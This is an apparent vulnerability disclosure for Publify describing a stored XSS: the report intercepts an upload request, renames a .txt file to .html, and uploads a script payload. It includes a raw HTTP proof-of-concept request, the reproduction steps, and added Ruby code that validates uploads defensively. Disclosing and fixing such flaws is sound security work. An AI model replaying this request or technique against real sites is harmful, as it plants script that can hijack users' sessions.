Bypass Restriction and File Upload Leads to XSS Stored - TXT to HTML in publify/publify
Reported on
May 19th 2022
Description
Unrestricted file upload allowed the attacker to manipulate the request and bypass the protection against HTML files by first uploading a text file; stored XSS was obtained once the HTML file had been uploaded.
Proof of Concept
POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"

✓
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"

TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain

<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"

Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--
Step 1 - Upload a .txt file and intercept the request
Step 2 - Change the extension of the filename to .html
Step 3 - Submit the request; the file is uploaded successfully
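The root cause above is that the server trusts the client-supplied filename (and the part's Content-Type) when deciding whether an upload is safe. The Ruby below is an added example written for this report, not Publify's own code: it validates an upload part by an extension allowlist, by magic bytes, and by an HTML sniff of the first 512 bytes, then generates the stored name itself and serves files with nosniff and attachment headers. The allowlists, the marker regex, and the function names are assumptions chosen for the demonstration.

```ruby
# Added example, not Publify's code: server-side gates an upload handler
# should apply to a multipart part regardless of what the client declares.
# All allowlists below are assumptions chosen for this demonstration.
require 'set'
require 'securerandom'

# Extensions the server is willing to store (assumption). html/htm/svg/xml
# are absent on purpose: browsers render those as active content.
ALLOWED_EXTENSIONS = Set.new(%w[txt png jpg jpeg gif pdf]).freeze

# What the bytes must look like for each extension, and the Content-Type
# the server will attach to that kind when serving it (assumption).
EXT_TO_KIND = {
  'txt' => :text, 'png' => :png, 'jpg' => :jpeg, 'jpeg' => :jpeg,
  'gif' => :gif, 'pdf' => :pdf
}.freeze
KIND_TO_TYPE = {
  text: 'text/plain', png: 'image/png', jpeg: 'image/jpeg',
  gif: 'image/gif', pdf: 'application/pdf'
}.freeze

# Tags that mark a body as HTML to a sniffing browser; checked in the first
# 512 bytes, the window browsers inspect. Deliberately conservative: a text
# file containing "< a >" is rejected rather than risk an executable upload.
HTML_MARKERS = /<\s*(?:!doctype\s+html|html|head|body|script|iframe|svg|img|a|meta|title|div|p|table|br)[\s>\/]/i

# Classify the content by its bytes alone, ignoring name and declared type.
def sniff_kind(bytes)
  b = bytes.b # binary copy so prefix comparisons never raise on encoding
  return :png  if b.start_with?("\x89PNG\r\n\x1a\n".b)
  return :jpeg if b.start_with?("\xFF\xD8\xFF".b)
  return :gif  if b.start_with?('GIF87a'.b) || b.start_with?('GIF89a'.b)
  return :pdf  if b.start_with?('%PDF-'.b)
  return :html if HTML_MARKERS.match?(b[0, 512])
  :text
end

# Validate one uploaded part. Returns [accepted?, reason].
def validate_upload(filename:, declared_type:, bytes:)
  ext = File.extname(filename.to_s).delete_prefix('.').downcase
  unless ALLOWED_EXTENSIONS.include?(ext)
    return [false, "extension #{ext.inspect} is not allowlisted"]
  end
  kind = sniff_kind(bytes)
  return [false, 'content sniffs as HTML'] if kind == :html
  unless kind == EXT_TO_KIND[ext]
    return [false, "content looks like #{kind}, not #{ext}"]
  end
  # The client's Content-Type is untrusted, but an inconsistent one is a
  # cheap signal that the request was tampered with.
  declared = declared_type.to_s.split(';').first.to_s.strip.downcase
  unless declared == KIND_TO_TYPE[kind]
    return [false, "declared Content-Type #{declared_type.inspect} does not match #{ext}"]
  end
  [true, 'ok']
end

# Never reuse the client's filename: the server picks the name and appends
# only an extension that already passed validation.
def storage_name(ext)
  "#{SecureRandom.hex(16)}.#{ext}"
end

# Headers for serving a stored resource: a fixed Content-Type derived from
# the validated kind, nosniff so the browser cannot reinterpret the bytes,
# and attachment disposition so nothing renders inline in the site's origin.
def download_headers(kind, stored_name)
  {
    'Content-Type' => KIND_TO_TYPE.fetch(kind),
    'X-Content-Type-Options' => 'nosniff',
    'Content-Disposition' => "attachment; filename=\"#{stored_name}\""
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample mirroring the report's part: filename changed to
  # .html, Content-Type left as text/plain, script body.
  body = "<script>alert('OOPSS');</script>"
  p validate_upload(filename: 'w00t.html', declared_type: 'text/plain', bytes: body)
  p validate_upload(filename: 'w00t.txt', declared_type: 'text/plain', bytes: body)
  p validate_upload(filename: 'notes.txt', declared_type: 'text/plain', bytes: "hello\n")
end
```

The three checks are layered on purpose: the extension allowlist alone is what the report bypasses, the magic-byte and HTML sniff catch a renamed file, and the nosniff/attachment headers mean that even a file which slips through is downloaded rather than executed in the blog's origin.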
Video
https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing
Impact
Successful exploitation of cross-site scripting vulnerabilities allows an attacker to run arbitrary script code in the context of the affected user. This can be used to compromise the integrity of content returned by the web server, to take over a user's session, or to redirect the user to a malicious website.